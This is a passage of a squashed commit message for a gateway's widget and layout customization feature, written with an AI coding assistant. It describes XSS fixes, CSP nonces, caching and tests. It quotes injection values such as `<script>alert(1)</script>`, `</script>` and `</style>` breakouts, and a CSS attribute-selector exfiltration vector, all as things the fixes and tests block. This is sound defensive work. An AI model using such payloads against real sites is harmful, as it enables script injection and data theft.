back to embedded HTML if no customizations exist. - css_handler: appends frontend/custom.css from workspace after the embedded base stylesheet. This completes the end-to-end flow: Agent writes frontend/layout.json → user refreshes → sees changes Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(frontend): wire up remaining widget system gaps Audit-driven fixes for the widget extension system: 1. Widget tab panel ID: panels now get id="tab-{widgetId}" so switchTab() can find and activate them 2. Widget JS auth: inline widget JS in assembled HTML instead of <script src> to protected endpoint (browser script tags can't send Authorization headers) 3. Layout config: fully implement tab ordering, default_tab, chat.suggestions, chat.image_upload application 4. SSE event forwarding: wrap EventSource.addEventListener to intercept all named events and dispatch to widget subscribers via IronClaw.api._dispatch() Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(frontend): XSS prevention, widget queue drain, code-block false positives Security (2 XSS fixes): 1. HTML-escape branding title in assemble_index() to prevent <script>alert(1)</script> injection via layout.json 2. Escape </script> in inlined widget JS to prevent script tag breakout — uses <\/script> replacement 3. Escape widget IDs in HTML attributes via escape_html_attr() Correctness: 4. Drain _widgetInitQueue after DOM is ready — widgets registered before tab-bar exists now mount correctly instead of silently failing 5. Skip inline <code> elements in upgradeInlineJson to prevent false-positive JSON card rendering on code spans like <code>{key: value}</code> 6. Document scope_css limitation with nested @media rules Tests (13 new): - XSS: title injection escaped, widget JS </script> breakout escaped, widget ID attribute escaped - Edge cases: escape_html basic, escape_html_attr quotes, missing head/body tags, empty widget JS, whitespace-only custom CSS skipped - Widget: at-rule not prefixed, declarations preserved, special chars in widget ID, all slot variants round-trip, minimal manifest [skip-regression-check] Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * style: fix clippy — collapsible if, while_let_on_iterator Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(ci): resolve frontend clippy and formatting failures * fix(frontend): address PR review — XSS, scope_css, cache, dedup Security (3 XSS gaps): 1. Layout JSON injected into <script>window.__IRONCLAW_LAYOUT__</script> is now run through escape_tag_close() — serde_json does not escape `<` or `/`, so a branding title containing `</script>` previously broke out of the script tag. Case-insensitive, UTF-8 safe. 2. Widget CSS and custom CSS injected into <style> tags are now escaped the same way against `</style>` breakouts. 3. New escape_tag_close() helper handles `</script`/`</style` uniformly (case-insensitive with tail preserved, via char-boundary walk). Correctness: 4. scope_css now tracks brace depth via a stack that distinguishes rule lists from declaration blocks. Selectors nested inside @media, @supports, @container, @layer, @document, @scope are recursively scoped. @keyframes/@font-face/@page bodies pass through opaque so inner keyframe selectors (0%, 100%) are not prefixed. The old single-bool parser produced unbalanced output on any nested rule. 5. WidgetInstanceConfig.enabled now defaults to true (via serde_default + manual Default impl). A layout entry that omits `enabled` while setting `config` no longer silently disables the widget. 6. build_frontend_html short-circuit replaced with a layout_has_customizations() helper covering all branding/tabs/chat fields. The old boolean missed subtitle, logo_url, favicon_url, default_tab, image_upload. 7. Custom CSS is now served only via /style.css (css_handler). Removed from FrontendBundle injection to prevent double-application. 8. Dead pub index_handler/css_handler/js_handler in handlers/static_files.rs removed — routes use private handlers in server.rs that need GatewayState. 9. Widget file path validation is now component-based via is_safe_segment / is_safe_relative_path. Rejects `.`, `..`, empty, `/`, `\`, NUL in any component, plus leading `/`. MIME detection is case-insensitive and adds .mjs / .map. 10. Layout and widget-manifest parse errors now log tracing::warn! instead of silently falling back. Extension system follow-ups: 11. Extracted shared widget-loading helpers (load_widget_manifests, load_resolved_widgets, read_widget_manifest) in handlers/frontend.rs. frontend_widgets_handler and build_frontend_html both delegate, so widget discovery exists in exactly one place. 12. New FrontendHtmlCache in GatewayState. Cache key is derived from the updated_at of frontend/layout.json and the frontend/widgets/ directory (max child mtime) via a single list("frontend/") call. A cache hit skips reading every widget manifest/JS/CSS per request. Edits invalidate naturally because list() sees the newer timestamp. Cache survives rebuild_state() by cloning the Arc. 13. upgradeInlineJson rewritten without the nested-quantifier regex. New _findJsonCandidates does a linear bracket scan that respects string literals and fast-skips <code>/<pre> regions. Three hard caps bound worst-case work (MAX_PARA_LEN=20000, MAX_SCAN=5000, MAX_CANDIDATES=32), eliminating the catastrophic-backtracking risk. Tests (29 new): - bundle.rs: 5 — layout JSON / widget CSS / custom CSS <script>/<style> breakouts, escape_tag_close case-insensitive, multi-byte safety - widget.rs: 5 — @media inner selector scoped, nested @supports+@media, @keyframes passthrough, sibling rules in @media, complex mix brace balance - layout.rs: 3 — enabled defaults true, Default impl enabled, explicit false respected - handlers/frontend.rs: 4 — segment allows/rejects, relative path allows/rejects (traversal, backslash, encoded separators) Quality gate: - cargo fmt clean - cargo clippy --all --benches --tests --examples --all-features → zero warnings - cargo test --lib -p ironclaw_frontend -p ironclaw → 4171 main + 43 frontend tests pass [skip-regression-check] Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix: post-merge — PairingStore::new_noop, CLI snapshot, docs Merge of origin/staging surfaced three small follow-ups: 1. src/channels/wasm/wrapper.rs — PairingStore::new() signature changed in staging to take (db, cache). Switch the test call site to PairingStore::new_noop() to match other tests in the file. 2. src/cli/snapshots/..long_help_output_without_import.snap — accept the new snapshot. Clap's render_long_help for --auto-approve now emits an indented blank line between the short and long description; this test was already failing on staging tip (see Staging CI run 24021660555) so the snapshot update was needed regardless of this PR. 3. src/workspace/seeds/FRONTEND.md — address new copilot comments: - Placeholder is `{id}` (matches API path segment and manifest id field), not `{name}`. - Only `slot: "tab"` is actually mounted by the browser runtime. Trim the slot list to what's implemented and mention IronClaw.registerChatRenderer() for inline rendering. The extra WidgetSlot variants stay in the Rust API for forward compatibility but are no longer advertised to users until mounting is wired. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * refactor: rename ironclaw_frontend → ironclaw_gateway, .system/gateway/ workspace Two coupled renames to align frontend assets with the broader `.system/` namespace introduced by other in-progress work: 1. Workspace folder: `frontend/` → `.system/gateway/` - layout.json, custom.css, widgets/{id}/, README.md, .config all move under `.system/gateway/` - LAYOUT_PATH and WIDGETS_DIR are now constants in the handler so a future move is a one-line change - is_config_path test updated to use the new path - FRONTEND.md seed rewritten to point at `.system/gateway/` - Cache key doc comments updated to match - No legacy or migration shim — this never shipped to prod 2. Crate: `ironclaw_frontend` → `ironclaw_gateway` - Matches how the surrounding subsystem is called (`channels/web` is "the gateway"). Cleaner mental model: workspace folder, crate name, and module name all align. - Directory renamed via `git mv` so history is preserved. - Cargo.toml workspace member + dependency updated; package name updated; description tweaked to "gateway frontend assets". - All `use ironclaw_frontend::` imports rewritten in server.rs and handlers/frontend.rs. - Doctest in widget.rs updated to use the new crate name. - Cargo.lock regenerated. The HTTP API paths stay as `/api/frontend/*` since they're a public surface; only the internal workspace path and crate name moved. Quality gate: - cargo fmt clean - cargo clippy --all --benches --tests --examples --all-features → zero warnings - cargo test -p ironclaw_gateway → 43 unit + 1 doctest pass - cargo test --lib -p ironclaw → 4228 pass (8 unrelated IPv6/DNS validation failures, also failing on clean post-merge baseline) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(gateway): per-request CSP nonce for inlined widget scripts Copilot review caught that `assemble_index()` injects two kinds of inline `<script>` blocks (the layout-config script and per-widget module scripts), but the gateway's CSP sets `script-src 'self' …CDNs…` with no `'unsafe-inline'` and no nonce — so the browser silently blocks every injected script the moment any customization is enabled. The widget runtime would never execute on a customized index page. Fix uses a per-request CSP nonce (W3C standard pattern): - `crates/ironclaw_gateway/src/bundle.rs` - New `NONCE_PLACEHOLDER` sentinel constant, re-exported from the crate root - `assemble_index()` stamps `nonce="__IRONCLAW_CSP_NONCE__"` on every injected `<script>` tag (both the layout-config script and each widget's module script) - Inline `<style>` blocks deliberately do NOT carry a nonce — the gateway's CSP allows `'unsafe-inline'` for `style-src`, so adding one would be dead weight; pinned with a regression test - Three new tests verify the placeholder appears on layout + widget scripts and is absent on widget styles - `src/channels/web/server.rs` - Static CSP layer now reads from a single `BASE_CSP` constant so the static and per-response variants stay in lock-step - New `build_csp_with_nonce(nonce)` produces the same CSP with `'nonce-{nonce}'` added to script-src, preserving the explicit CDN list and the strict `style-src 'self' 'unsafe-inline' …` policy - New `generate_csp_nonce()` returns 16 random bytes hex-encoded via OsRng — same primitive `tokens_create_handler` already uses - `index_handler` now returns `Response` (not `impl IntoResponse`) so it can branch: - Workspace has no customizations → serve embedded `INDEX_HTML` unchanged; the static CSP layer applies (no inline scripts to authorize anyway) - Workspace has customizations → generate fresh nonce, replace placeholder in cached HTML, and emit a per-response `Content-Security-Policy` header with the nonce. Setting the header here suppresses the global `if_not_present` layer for this response only. - Two new unit tests pin the nonce-source position in script-src and the format/uniqueness of `generate_csp_nonce()` The HTML cache still works because the cached HTML contains the placeholder (not the actual nonce); per-request substitution preserves caching while the browser still sees a unique nonce on every page load. Quality gate: - cargo fmt clean - cargo clippy --all --benches --tests --examples --all-features → zero warnings - cargo test -p ironclaw_gateway → 46 pass (+3 nonce tests) - cargo test --lib -p ironclaw → 4238 pass (+2 CSP tests) Refs: PR #1725 review by copilot-pull-request-reviewer [skip-regression-check] Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(gateway): wire ko.js asset through ironclaw_gateway::assets The merge of staging brought in a Korean i18n pack referenced via include_str!("static/i18n/ko.js") in src/channels/web/server.rs. After the gateway extraction the static/ directory moved into crates/ironclaw_gateway/static/, so the legacy include_str! path no longer resolved. Add I18N_KO_JS to ironclaw_gateway::assets and make the i18n_ko_handler reference it like the other language packs. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * test(e2e): add Playwright coverage for chat-driven frontend customization Adds two end-to-end scenarios for the widget extension system shipped in PR #1725, both driven by talking to the agent in chat: 1. **Tab bar to left side panel.** The user asks the agent to move the tab bar; the mock LLM emits a `memory_write` tool call writing `.system/gateway/custom.css`, and after a reload the test asserts the served stylesheet contains the overlay, the computed flex-direction of `.tab-bar` is `column`, and the bar is now taller than it is wide. 2. **Workspace-data widget.** The user asks the agent to create a "Skills" widget that renders workspace skills. Two chat turns write `.system/gateway/widgets/skills-viewer/manifest.json` and `index.js` into the workspace. After a reload the test verifies the new tab button appears in `.tab-bar`, switches to it, waits for the widget's `data-testid="skills-viewer-root"` to mount, and asserts the widget actually fetched `/api/skills` (no `skills-viewer-error` marker) and that the panel carries the `data-widget="skills-viewer"` attribute the gateway runtime stamps for CSS isolation. Both tests share a `clean_customizations` fixture that wipes the workspace overlay files before and after each run so the session-scoped gateway server stays isolated across tests in the file (`memory_write` treats empty content as effectively cleared, and the gateway skips empty / unparseable widget files silently). Supporting changes: - **mock_llm.py**: three new `TOOL_CALL_PATTERNS` (`customize: move tab bar to left`, `customize: create skills viewer manifest`, `customize: install skills viewer code`) that emit one `memory_write` call per turn — the existing one-tool-per-response shape is preserved. - **app.js (`_addWidgetTab`)**: fix a latent bug where widget tabs would be queued forever because the function looked for a `.tab-content` / `#tab-content` element that the gateway HTML never ships. The built-in tab panels live as siblings of `.tab-bar` inside `#app`, so we now resolve the parent off the first existing `.tab-panel` (with `#app` as a final fallback). Without this fix the Skills widget tab never mounts and the second scenario can't pass. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * test(e2e): support multi tool calls per response in mock_llm The mock LLM previously emitted at most one tool call per assistant turn. That shape silently bypasses the v2 engine and CodeAct dispatch paths, where a single response can fan out into several parallel tool calls (or several Python helper invocations from one script). Tests written against that constraint were either contorted into multiple chat turns or quietly failed to cover multi-call regressions. Changes: - ``TOOL_CALL_PATTERNS`` args functions may now return ``list[dict]`` instead of a single ``dict``. Each item is its own ``{"tool_name", "arguments"}`` pair, so one trigger can mix several tools in one response. ``_normalize_tool_calls`` always wraps the return value into a list so the dispatcher stays shape-agnostic. - ``match_tool_call`` returns ``list[dict] | None``. - ``_tool_call_response`` and ``_stream_tool_call`` now accept either a single dict (legacy callers) or a list. The streaming path emits per-tool-call header + arguments chunks with distinct ``index`` values, exercising clients' per-index merging logic the same way real providers force them to. - ``_find_tool_results`` collects every fresh ``role: tool`` message after the most recent user turn (not just the first), and the chat-completion summary path renders a multi-line acknowledgment when more than one tool ran in a single turn. The single-result helper is kept as a thin shim for the special-response path. - The PR #1725 customization scenario is consolidated: instead of three separate triggers (one memory_write each), the ``customize: install skills viewer widget`` trigger now emits *both* the manifest and ``index.js`` writes in one assistant turn. The ``customize: move tab bar to left`` trigger stays single-call to cover the legacy code path. The Playwright test in ``test_widget_customization.py`` is updated to a single chat turn for the widget install — if the v2 engine ever drops the second parallel call, the test will fail because the new tab can't mount without both files. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(gateway): address PR #1725 review feedback Four issues raised in the 2026-04-07 review pass: 1. **Widget id / directory mismatch** (`src/channels/web/handlers/frontend.rs`). `read_widget_manifest` now rejects widgets whose `manifest.id` does not match the on-disk directory name. The loader uses the directory name to compute file paths (`{WIDGETS_DIR}{dir}/index.js`) while the layout-config gating and the public `/api/frontend/widget/{id}/{*file}` endpoint key off `manifest.id`. When those drift, code can be mounted from one folder under a different id and the file API silently 404s — a correctness footgun for widget authors and a path-confusion attack surface for the serving handler. Fix lives in the shared helper so both `load_resolved_widgets` and `load_widget_manifests` get it. Adds regression tests for both the rejection and the matching path. 2/3. **`memory_write` doc examples used the wrong parameter name** (`src/workspace/seeds/FRONTEND.md`). The seeded customization guide showed `memory_write path=".system/gateway/..."`, but the actual tool parameter is `target` (`src/tools/builtin/memory.rs`). As written the examples wouldn't work if copy-pasted into a tool call. Both examples (layout.json + custom.css) updated to `target=`. 4. **`css_handler` allocated on the hot path** (`src/channels/web/server.rs`). The handler always called `assets::STYLE_CSS.to_string()` in the no-overlay branches, copying the entire embedded stylesheet on every request. Switched the local to `Cow<'static, str>` so the common path borrows the static string and only the overlay branch pays for an owned `format!`. Quality gate: - `cargo fmt` clean - `cargo clippy --no-default-features --features libsql --tests` zero warnings - `cargo test --no-default-features --features libsql --lib channels::web::handlers::frontend` — 6 passed (4 existing + 2 new regression tests) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(gateway): address PR #1725 paranoid-architect review Five issues raised in the 2026-04-07 review pass: 1. **High — `</style>` breakout XSS in branding CSS-vars injection** (`crates/ironclaw_gateway/src/bundle.rs`). Every other inline injection point in `assemble_index()` runs through `escape_tag_close`, but the branding `<style>` block formatted directly. A hostile color value containing `</style>` could close the tag early and inject HTML. Now wraps `css_vars` in `escape_tag_close(&css_vars, "</style")` for defense in depth, with a regression test in `test_assemble_index_branding_style_breakout_escaped`. 2. **Medium — CSS property injection via unvalidated branding colors** (`crates/ironclaw_gateway/src/layout.rs`). `to_css_vars()` interpolated `primary` / `accent` strings raw into `--color-primary: {};`, letting a hostile `layout.json` break out of the `:root {}` block (e.g. `red; } .chat-input[value^="s"] { background: url(...) }`). Added `is_safe_css_color()` validator that accepts hex literals, modern functional notation including `rgb(0 0 0 / 50%)`, and bare named colors, while rejecting `;`, `{}`, `<>`, quotes, backslash, `*` (handles both `/*` and `*/` comment markers), `url(...)`, and unknown functions. `to_css_vars()` silently drops invalid values so the rest of the branding config still applies. Six new unit tests cover the accepted forms, the injection vectors, and the `to_css_vars` drop. 3. **Medium — CSP policy duplication risks silent drift** (`src/channels/web/server.rs`). `BASE_CSP` and `build_csp_with_nonce` re-hardcoded every directive independently, so adding a `connect-src` to one would silently leave the other on the old policy. Extracted per-directive constants (`STYLE_SRC`, `FONT_SRC`, `CONNECT_SRC`, `IMG_SRC`, `FRAME_SRC`, `FORM_ACTION`) and built both flavors via a single `build_csp(nonce: Option<&str>)` helper. `BASE_CSP_HEADER` is now a `LazyLock<HeaderValue>` (with a safe minimal fallback to honor the no-`.expect()` rule on the request path). Added two regression tests: `test_base_and_nonce_csp_agree_outside_script_src` strips the `script-src` directive from both flavors and asserts byte equality, and `test_base_csp_header_matches_build_csp_none` locks the lazy header to `build_csp(None)`. 4. **Medium — `_wipe_customizations` ignored HTTP status** (`tests/e2e/scenarios/test_widget_customization.py`). The cleanup posts now assert `status_code == 200` with `resp.text` in the message, so an auth/server failure surfaces immediately instead of bleeding leftover workspace state into the next test. 5. **Drive-by — pre-existing flake in `test_telegram_token_colon_preserved _in_validation_url`** (`src/extensions/manager.rs`). The test reads `IRONCLAW_TEST_TELEGRAM_API_BASE_URL` via `telegram_bot_api_url` without taking the `lock_env()` mutex, so when a parallel test holds the override the read races and the assertion sees `http://127.0.0.1:.../bot…` instead of `https://api.telegram.org/`. The new tests in this PR changed scheduling enough to surface the race on every run. Fixed by acquiring the same `ScopedEnvVar` lock and clearing the override inside the test, making it deterministic. Quality gate: - `cargo fmt` clean - `cargo clippy --no-default-features --features libsql --tests` zero warnings - `cargo test --no-default-features --features libsql --lib` — 4284 passed - `cargo test -p ironclaw_gateway` — 50 unit + 1 doctest passed (was 46) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * ci: nudge workflows for b88d4554 (Actions trigger missed) * fix(gateway): address PR #1725 zmanian review Five items raised in zmanian's 2026-04-08 review (approved). None are blockers; this sweep avoids carrying them as follow-up debt. 1. **Document widget trust model** (`src/workspace/seeds/FRONTEND.md`). New "Security model" section spells out that widgets run with full session authority via `IronClaw.api.fetch`, share the same DOM as the built-in tabs, and are *not* sandboxed at the JS layer. The trust boundary lives one layer up: anything that can `memory_write` a widget file already has agent authority. Operators who want stricter isolation should mount untrusted UI in an `<iframe sandbox>` from a trusted widget. 2. **Extract shared `read_layout_config` helper** (`src/channels/web/handlers/frontend.rs`, `src/channels/web/server.rs`). Both `frontend_layout_handler` and `build_frontend_html` had identical read-parse-fallback bodies — the kind of drift trap zmanian flagged. Hoisted the helper into `handlers/frontend.rs` as `pub async fn read_layout_config`; `server.rs` deletes its private copy and imports the shared one. The single source of truth means a future change to the warning text or fallback semantics lands once. 3. **Escape `def.id` and `e.message` in `_addWidgetTab` error path** (`crates/ironclaw_gateway/static/app.js`). The catch block built the failure banner via `innerHTML` with raw interpolation. CSP blocks the script vector, but every other innerHTML write in this file routes user-controlled strings through `escapeHtml()`, and an inconsistent escape discipline is exactly the kind of regression future readers shouldn't have to re-litigate. Now wraps both `def.id` and `String(e?.message ?? e)` in `escapeHtml`. 4. **Gate `upgradeInlineJson` behind opt-in flag** (`crates/ironclaw_gateway/src/layout.rs`, `crates/ironclaw_gateway/static/app.js`, `src/channels/web/server.rs`). The bracket-counting heuristic pattern-matches any balanced `{...}` in rendered markdown — prose like `"set the value to {x: 1, y: 2}"` gets mangled into a styled data card. New `ChatConfig::upgrade_inline_json: Option<bool>` defaults to `None` (off); operators that pipe structured data through chat can flip it on via `.system/gateway/layout.json`. `app.js` checks `window.__IRONCLAW_LAYOUT__.chat.upgrade_inline_json === true` before invoking the rewrite. Also added the field to `layout_has_customizations` so a layout that only sets this flag still triggers the customized HTML path. Two new `ironclaw_gateway` tests pin the default-off serde shape and the explicit-true round-trip (omitted field must not appear in serialized output). 5. **ETag cache-busting on `/style.css`** (`src/channels/web/server.rs`). Operators editing `custom.css` had to ask users to hard-refresh because the response carried only `Cache-Control: no-cache` with no validator. Added `css_etag()` producing a strong `"sha256-…"` validator over the assembled body (16 hex chars / 64 bits — plenty for content addressing on a single-tenant CSS payload). `css_handler` now extracts the request `HeaderMap`, honors `If-None-Match` (exact match or `*`) with a `304 Not Modified` + empty body, and otherwise emits `ETag` on the 200 response. The `Cache-Control: no-cache` stays so the browser always revalidates — together with the ETag this gives "fast 304" semantics rather than a stale `max-age` window where edits don't show up. Four new tests in `server.rs::tests`: - `test_css_etag_is_strong_validator_format` (no `W/`, quoted, ASCII) - `test_css_etag_changes_when_body_changes` (single-byte mutation invalidates) - `test_css_etag_stable_for_identical_body` (cache hit reproducible) - `test_css_handler_returns_etag_and_serves_304_on_match` (full handler round-trip via `tower::ServiceExt::oneshot`: 200 → ETag → 304 on match → 200 on stale validator) Quality gate: - `cargo fmt` clean - `cargo clippy --no-default-features --features libsql --tests` zero warnings - `cargo test -p ironclaw_gateway` — 52 unit + 1 doctest passed (was 50; +2 for the new chat-config flag tests) - `cargo test --no-default-features --features libsql --lib channels::web` — 334 passed (includes the 4 new ETag tests, the existing widget loader tests, and the shared `read_layout_config` callers on both ends) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(gateway): land deferred items from PR #1725 paranoid-architect summary Both items the previous sweep (1c361d42) explicitly deferred. Closing the loop so they don't get lost as follow-up debt. 1. **`assemble_index` no longer silently drops layout serialization failures** (`crates/ironclaw_gateway/src/bundle.rs`). The `if let Ok(layout_json) = serde_json::to_string(&bundle.layout)` shortcut would discard the entire `window.__IRONCLAW_LAYOUT__` injection on error and the customized HTML would ship without any branding/tab/chat customizations applied — and the IIFE in `app.js` would no-op them all without leaving a trace. The branch is unreachable on well-typed input (`LayoutConfig` and every nested type derive `Serialize` cleanly), but a future field that adds a serialization-fallible type — `serde_json::Value`, a custom `Serialize` impl, an `i128` — would silently regress the entire customization path. Now the error branch logs `tracing::warn!` with the serde error so the failure is observable. Required pulling `tracing = "0.1"` into `crates/ironclaw_gateway/` (already in the workspace dep set; the gateway crate just hadn't needed it yet). 2. **`default_tab` is applied after the widget queue drains** (`crates/ironclaw_gateway/static/app.js`). The layout-config IIFE used to call `switchTab(layout.tabs.default_tab)` from inside the same block that handled branding/tabs/chat. That block runs *before* `_widgetInitQueue.drain` mounts widget panels, so any widget-provided tab id (e.g. `default_tab: "dashboard"` where `dashboard` comes from a registered widget) silently no-ops — `switchTab` looks up `#tab-dashboard`, finds nothing, and the user lands on the default built-in tab instead. The setting appeared broken to anyone who tried it. Fix: hoist the `default_tab` switch out of the layout IIFE and place it after the `_widgetInitQueue` drain. Hash navigation still wins (so `#chat` deep-links survive a customized `default_tab`), and the block only runs when a layout was actually injected. Left an inline `NOTE` at the original site so a future contributor doesn't "helpfully" move it back inside the IIFE. Quality gate: - `cargo fmt` clean - `cargo clippy --no-default-features --features libsql --tests` zero warnings - `cargo test -p ironclaw_gateway` — 52 unit + 1 doctest passed (no count change; #1 is a logging path with no new test surface and #2 is JS-side) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * chore: update Cargo.lock for ironclaw_gateway tracing dep Forgotten in 8edca735, which added `tracing = "0.1"` to `crates/ironclaw_gateway/Cargo.toml` to support the new `tracing::warn!` on layout serialization failure in `assemble_index`. The `tracing` crate is already pulled in transitively elsewhere in the workspace, so this is purely a manifest-side dependency declaration. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(gateway): align layout selectors with real DOM (PR #1725 Copilot review) Two "low confidence" findings from the latest Copilot review pass that are both real bugs — the affected layout flags silently no-opped because the JS selectors didn't match the elements actually rendered by `static/index.html`. 1. **`tabs.hidden` only matched widget tabs, not built-ins.** `_addWidgetTab` creates buttons with `class="tab-btn"`, but the built-in tab `<button>`s in `index.html:157-162` are plain `<button data-tab="chat">` etc. with no class. The previous selector — `.tab-btn[data-tab="…"]` — therefore only matched widget-injected buttons, so a layout like `tabs.hidden: ["routines"]` (a built-in) silently did nothing. Switched to `.tab-bar button[data-tab="…"]`, which matches both variants while still scoping the lookup to the tab bar (so a stray `<button data-tab>` elsewhere on the page can't be hidden by accident). 2. **`chat.image_upload === false` targeted a non-existent element.** The handler tried to hide `#image-upload-btn`, but the actual composer in `index.html` uses `#attach-btn` (the visible paperclip) and `#image-file-input` (the hidden file input). The flag therefore never disabled image uploads. Now hides `#attach-btn` AND sets `#image-file-input.disabled = true`, so a programmatic `document.getElementById('image-file-input').click()` from a widget or extension can't bypass the operator's intent — the capability is actually gone, not just the chrome. Both bugs share the same root cause: the layout-config IIFE was written against a hypothetical DOM rather than the one `index.html` ships, and there's no e2e test that exercises a layout with `tabs.hidden` set to a built-in or `chat.image_upload: false`, so the regression slid through. (A follow-up Playwright scenario would catch the next instance of this — tracking separately rather than expanding the scope of this PR.) Quality gate: - `cargo fmt` clean - `cargo clippy -p ironclaw_gateway --tests` zero warnings - `cargo test -p ironclaw_gateway` — 52 unit + 1 doctest passed (no count change; both fixes are JS-side) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * test(e2e): regression test for layout selector / DOM drift (PR #1725) The two `app.js` selector bugs Copilot caught in PR #1725 review pass 4072914579 (`tabs.hidden` only matched widget-injected `.tab-btn` buttons rather than built-in plain `<button data-tab>`s, and `chat.image_upload === false` targeted a non-existent `#image-upload-btn` instead of `#attach-btn` / `#image-file-input`) both slid through code review for the same root reason: there was no e2e test that loaded a customized layout and asked the browser whether the flags actually took effect. The unit tests on the Rust side verified `LayoutConfig` round-trips, and the existing widget-tab test exercised the *widget* path of the same selectors — neither would have caught a built-in-tab regression or a wrong DOM id. New scenario: `test_layout_hidden_built_in_tab_and_image_upload_disabled` * Writes a `.system/gateway/layout.json` with `tabs.hidden: ["routines"]` (a built-in, on purpose — the previous bug was that only widget tabs could be hidden, so the built-in is exactly what the selector regression broke) and `chat.image_upload: false`. * Drives the write directly via `/api/memory/write` rather than chat. The customization path is independent of the agent loop, and side-stepping the mock LLM keeps the test fast and decoupled from the canned-response set. * Reloads the gateway in a fresh browser context so `assemble_index` re-runs and `window.__IRONCLAW_LAYOUT__` carries the new flags. * Asserts via `getComputedStyle` (not the inline `style` attribute, so the assertion survives a future refactor that swaps `style.display = 'none'` for a class toggle): - The `routines` built-in tab has `display: none`. - `chat`, `memory`, and `settings` built-in tabs are still visible (catches accidental over-matching by a future selector change). - `#attach-btn` has `display: none`. - `#image-file-input.disabled === true`. Asserting BOTH the visible button hide AND the underlying input disable is the contract — a widget that calls `document.getElementById('image-file-input').click()` must NOT be able to bypass the operator's intent. * Each "tab disappeared from the DOM entirely" / "input doesn't exist" case has a distinct error message so a future `index.html` restructure produces an actionable failure rather than a confusing null-deref. Also added `.system/gateway/layout.json` to `_CUSTOM_PATHS` so `_wipe_customizations` clears it between tests in the shared session-scoped server fixture. Could not run the test locally — the e2e suite requires a libsql ironclaw binary build (~10 min) plus a Python venv with Playwright, neither of which is set up in this environment. Test is written against the same `_open_authed_page` / `_CUSTOM_PATHS` / `memory/write` patterns the rest of the file uses, and the DOM ids were grepped out of `crates/ironclaw_gateway/static/index.html` directly (`#attach-btn`, `#image-file-input`, `<button data-tab="routines">`). First real exercise will be in CI. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(gateway): refuse customized index in multi-tenant mode (PR #1725 blocker) Cross-tenant cache leak — `frontend_html_cache` is a single `Arc<RwLock<Option<FrontendHtmlCache>>>` per `GatewayState` with no user dimension, and `build_frontend_html` reads `state.workspace` directly. In multi-tenant deployments (`resolve_workspace(&state, &user)` driven by `workspace_pool`) this is unsafe in two compounding ways: 1. **Latent**: even without the cache, `build_frontend_html` reading `state.workspace` ignores the per-user pool entirely. If the single-user fallback workspace is also populated, every user sees that one global workspace's `layout.json` / widgets — one operator's branding, hidden tabs, and registered widgets leak to every other tenant on the same gateway. 2. **Cache pin**: even if (1) were fixed, the cache key is just `(.system/gateway/layout.json mtime, .system/gateway/widgets/ mtime)` against the global workspace — there is no `user_id` in the key. Once the slot is populated, every subsequent `GET /` hits the same HTML. Root cause: the customization assembly path is fundamentally single-tenant. `index_handler` (`GET /`) is the unauthenticated bootstrap route — no user identity is available at request time, so there is no way to resolve the *correct* per-user workspace inside `build_frontend_html`. The reviewer flagged this as a cache bug; it's actually an architectural mismatch that the cache makes visible. **Fix:** in multi-tenant mode (`workspace_pool` set), `build_frontend_html` short-circuits with `return None` BEFORE reading `state.workspace` and BEFORE the cache write at the bottom of the function. The embedded default `INDEX_HTML` is then served to every user, the static CSP layer applies unchanged (no inline scripts, no nonce needed), and the cache slot stays empty so it cannot pin any leaked HTML. This is the minimal fix that makes the gateway safe to ship in multi-tenant mode. Per-user customization in multi-tenant deployments will land in a follow-up PR via a JS-side `fetch('/api/frontend/layout')` after auth — that endpoint already exists and already routes through `resolve_workspace(&state, &user)`, so it returns the right workspace. The layout-config IIFE in `crates/ironclaw_gateway/static/app.js` already reads `window.__IRONCLAW_LAYOUT__`, which a future change can populate from that fetch instead of from server-side HTML injection. Documented the constraint in the doc comment on `build_frontend_html` so future contributors understand WHY the early return is there (hands-tied at the unauthenticated route, not laziness) and what the correct path forward looks like. Regression test: `test_build_frontend_html_returns_none_in_multi_tenant_mode` (gated on `feature = "libsql"` for the workspace backend). The test seeds a *global* workspace with a hostile-looking layout (`{"branding":{"title":"TENANT-LEAK-BAIT"}}`) AND a `WorkspacePool`, attaches both to the GatewayState via `Arc::get_mut`, and asserts: 1. `build_frontend_html` returns `None` — if it ever reads `state.workspace` again in multi-tenant mode, the bait title would land in the assembled HTML and this test would fail loudly with an actionable diagnostic. 2. `state.frontend_html_cache` slot is still `None` after the call — the early return must short-circuit BEFORE the cache write at the bottom of the function, otherwise a poisoned entry would serve the leaked HTML to subsequent requests even after the bug is fixed. Both contracts are independent — a future regression that breaks one without the other is still caught. Quality gate: - `cargo fmt` clean - `cargo clippy --no-default-features --features libsql --tests` zero warnings - `cargo test --no-default-features --features libsql --lib channels::web` — 335 passed (was 334; +1 for the new multi-tenant guard test) - `cargo test -p ironclaw_gateway` — 52 unit + 1 doctest passed Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(gateway): address PR #1725 Copilot review (6 findings) Six new inline findings from the latest Copilot review pass on PR #1725. All verified against the source — no false positives this round. Grouped by file: **1+2. Widget directory names not validated against `is_safe_segment`** (`src/channels/web/handlers/frontend.rs`). Both `load_widget_manifests` and `load_resolved_widgets` fed `entry.name()` straight into `read_widget_manifest`, which composed `{WIDGETS_DIR}{name}/manifest.json` and friends without checking the segment. Any filesystem-backed `Workspace` implementation that 